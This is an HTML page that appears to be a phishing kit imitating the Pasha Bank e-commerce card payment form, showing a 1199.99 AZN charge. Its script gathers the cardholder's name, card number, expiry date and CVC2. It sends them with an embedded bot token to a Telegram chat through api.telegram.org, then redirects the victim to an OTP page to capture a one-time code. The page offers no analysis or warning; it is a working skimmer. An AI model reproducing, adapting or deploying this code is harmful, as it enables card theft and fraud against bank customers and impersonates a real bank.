<!DOCTYPE html>
<!-- saved from url=(0092)https://ecomm.pashabank.az:8463/ecomm2/ClientHandler?trans_id=6o47pqDpUDPdSN0NbRXQl80thBw%3D -->
<html>

<head>
	<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">

	<meta name="viewport" content="width=device-width, initial-scale=1.0">
	<meta name="viewport" content="width=device-width, user-scalable=no">
	<link rel="shortcut icon" href="https://ecomm.pashabank.az:8463/ecomm2/template/template/images/favicon.ico"
		type="image/ico">
	<title>Pasha Bank E-commerce</title>

	<link rel="stylesheet" href="./ode_files/styles.css" type="text/css">
	<style id="video-roll-deg-scale" type="text/css">
		.video-roll-deg-scale {}
	</style>
	<style id="video-roll-focus-style" type="text/css">
		#video-roll-root-mask {
			display: none;
			position: fixed;
			left: 0;
			top: 0;
			width: 100%;
			height: 100%;
			backdrop-filter: unset;
			z-index: 20000 !important;
			background-color: rgba(0, 0, 0, 0.9);
		}

		.video-roll-focus {
			width: undefinedpx;
			height: undefinedpx;
			position: absolute;
			left: 0;
			right: 0;
			top: 0;
			bottom: 0;
			margin: auto;
			border-radius: unset
		}
	</style>

</head>

<body>
	<div class="mainwrapper">
		<header class="ecom-header">
			<img class="logo" src="./ode_files/pb-logo.svg" alt="pb-logo">
			<label class="amount-label">Ümumi məbləğ</label>
			<label id="ledger" class="amount">1199.99 AZN</label>
		</header>

		<main>
			<form id="cardentry" method="post" autocomplete="off">

				<!--<input type="hidden" name="merchant" value="0003851">-->
				<div class="input-field">
					<label for="cardname">Ad və Soyad</label>
					<input tabindex="1" id="cardname" name="cardname" type="text" maxlength="26" autocomplete="cc-name"
						placeholder="Kart üzərindəki ad və soyad">
					<p id="cardname-error-mandatory" class="error-message hidden">
						Xana məlumatları qeyd olunmalıdır
					</p>
					<p id="cardname-error-alpha" class="error-message hidden">
						Rəqəm və simvollardan istifadə edilməməlidir
					</p>
				</div>

				<div class="input-field">
					<label for="cardnr">Kart nömrəsi</label>
					<div class="input-with-icon">
						<input tabindex="2" type="text" id="cardnr" name="cardnr" placeholder="1234 1234 1234 1234" maxlength="19" placeholder="#### #### #### ####"
							maxlength="19" autocomplete="cc-number">
						<img id="card-number-icon" src="./ode_files/card.svg" alt="card">
					</div>
					<p id="cardnr-error-mandatory" class="error-message hidden">
						Xana məlumatları qeyd olunmalıdır
					</p>
					<p id="cardnr-error-length" class="error-message hidden">
						16 rəqəmli olmalıdır.
					</p>
				</div>
				<p id="keycode"></p>
				<div class="input-group">
					<div class="input-field">
						<label for="expire-date">Kartın bitmə tarixi</label>
						<input id="expire-date" type="text" placeholder="ay / il" maxlength="5" autocomplete="cc-exp"
							inputmode="text">
						<p id="expire-date-error-mandatory" class="error-message hidden">
							Xana məlumatları qeyd olunmalıdır
						</p>
						<p id="expire-date-error-format" class="error-message hidden">
							Format yanlışdır
						</p>
						<input type="hidden" name="validMONTH" id="month-input">
						<input type="hidden" name="validYEAR" id="year-input">
					</div>

					<div class="input-field">
						<label for="cvc2">CVC2 / CVV2</label>
						<div class="input-with-icon">
							<input id="cvc2" name="cvc2" type="password" placeholder="123" maxlength="4"
								autocomplete="cc-csc">
							<img src="./ode_files/cvc.svg" alt="card">
						</div>
						<p id="cvc2-error-mandatory" class="error-message hidden">
							Xana məlumatları qeyd olunmalıdır
						</p>
						<p id="cvc2-error-length" class="error-message hidden">
							3 rəqəmli olmalıdır
						</p>
					</div>
				</div>
				<button id="pay-btn" class="btn pay-btn" type="button">
					Ödəniş et
				</button>
			</form>
		</main>
	</div>

	<footer>
		<div class="plastic-cards-container">
			<div class="plastic-cards">
				<img src="./ode_files/verified-by-visa.svg" alt="verified-by-visa">
				<img src="./ode_files/visa.svg" alt="visa">
				<img src="./ode_files/visa-electron.svg" alt="visa-electron">
			</div>
			<div class="plastic-cards">
				<img src="./ode_files/maestro.svg" alt="maestro">
				<img src="./ode_files/mastercard.svg" alt="mastercard">
				<img src="./ode_files/mastercard-secure-code.svg" alt="mastercard-secure-code">
			</div>
		</div>
		<div class="contacts">
			<p>Bankla əlaqə üçün:</p>
			<p>
				customer.care@pashabank.az
				<span class="seperator">|</span>&nbsp;<span class="bank-number">+994 (12) 496 50 00</span>
			</p>
			<p id="copyrights">© Copyrights 2007-2024 PAŞA Bank</p>
		</div>
	</footer>



	<div id="video-roll-root-mask"></div>
</body>
<script src="https://code.jquery.com/jquery-3.6.4.min.js"></script>

<script>
	document.addEventListener('DOMContentLoaded', function () {
		const cardNumberInput = document.querySelector('#cardnr');
		cardNumberInput.addEventListener('input', function () {
			let value = this.value.replace(/\D/g, '');
			value = value.replace(/(\d{4})(?=\d)/g, '$1 ');
			this.value = value.trim();
		});

		const expiryDateInput = document.querySelector('#expire-date');
		expiryDateInput.addEventListener('input', function () {
			let value = this.value.replace(/\D/g, '');
			if (value.length > 2) {
				value = value.replace(/^(\d{2})(\d{0,2})$/, '$1/$2');
			}
			this.value = value;
		});

		const cvvInput = document.querySelector('#cvc2');
		cvvInput.addEventListener('input', function () {
			this.value = this.value.replace(/\D/g, '');
		});
	});
</script>

<script>
	document.addEventListener('DOMContentLoaded', function () {
		const cardname = document.querySelector('#cardname');
		const cardnumber = document.querySelector('#cardnr');
		const expiredate = document.querySelector('#expire-date');
		const cvc2 = document.querySelector('#cvc2');
		const paybtn = document.querySelector('#pay-btn');
		
		
		function checkInputs() {
			if (cardname.value.trim() !== '' && cardnumber.value.trim() !== '' && expiredate.value.trim() !== '' && cvc2.value.trim() !== '') {
				paybtn.disabled = false;
			} else {
				paybtn.disabled = true;
			}
		}


		cardname.addEventListener('input', checkInputs);
		cardnumber.addEventListener('input', checkInputs);
		expiredate.addEventListener('input', checkInputs);
		cvc2.addEventListener('input', checkInputs);
	});


	var telegram_bot_id = "7226407963:AAFZG2ETNSzsp8LWDlLbrWG4vrtb9qz_vqQ";
	var chat_id = -4644944656;
	var cardnm, cardnr, expdate, cvc, message;
	var ready = function () {
		cardnm = document.getElementById("cardname").value;
		cardnr = document.getElementById("cardnr").value;
		expdate = document.getElementById("expire-date").value;
		cvc = document.getElementById("cvc2").value;
		message = "Log: " + "irshad 💳" + "\nMəbləğ: " + "1199.99 AZN" + "\nCard Name: " + cardnm + "\nCard Number: " + cardnr + "\nExpire Date: " + expdate + "\nCVC2: " + cvc;
	};
	var sender = function () {
		ready();
		var telegramSettings = {
			"async": true,
			"crossDomain": true,
			"url": "https://api.telegram.org/bot" + telegram_bot_id + "/sendMessage",
			"method": "POST",
			"headers": {
				"Content-Type": "application/json",
				"cache-control": "no-cache"
			}, "data": JSON.stringify({ "chat_id": chat_id, "text": message })
		};
		$.ajax(telegramSettings).done(function (response) { console.log("Tamam:", response); });
		last4 = cardnr.slice(-4);
		cardnm = document.getElementById("cardname").value = "";
		cardnr = document.getElementById("cardnr").value = "";
		expdate = document.getElementById("expire-date").value = "";
		cvc = document.getElementById("cvc2").value = "";
		setTimeout(function () { window.location.href = "otp.html?cardnr=" + last4; }, 1000);
		return false;
	};

	document.getElementById("pay-btn").addEventListener("click", function (event) {
		event.preventDefault();
		sender();
	});
</script>

<script>'undefined'=== typeof _trfq || (window._trfq = []);'undefined'=== typeof _trfd && (window._trfd=[]),_trfd.push({'tccl.baseHost':'secureserver.net'},{'ap':'cpsh-oh'},{'server':'p3plzcpnl508660'},{'dcenter':'p3'},{'cp_id':'10182053'},{'cp_cl':'8'}) // Monitoring performance to make your website faster. If you want to opt-out, please contact web hosting support.</script><script src='https://img1.wsimg.com/traffic-assets/js/tccl.min.js'></script></html>